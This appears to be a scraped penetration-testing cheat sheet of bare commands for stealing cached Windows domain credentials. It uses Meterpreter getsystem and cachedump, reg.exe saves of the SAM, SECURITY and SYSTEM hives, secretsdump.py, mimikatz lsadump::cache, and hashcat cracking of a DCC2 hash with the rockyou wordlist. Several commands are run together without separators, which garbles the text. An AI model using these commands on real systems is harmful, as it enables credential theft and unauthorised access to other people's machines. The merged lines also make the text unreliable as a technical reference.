getuid
getsystem
use post/windows/gather/cachedump
runreg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.savesecretsdump.py -sam sam.save -security security.save -system system.save LOCALlsadump::cache$DCC2$10240#username#hashecho ; cat hashes.txt ; echo ; cut -d ":" -f 2 hashes.txthashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disableHKEY_LOCAL_MACHINE\SECURITY\Cache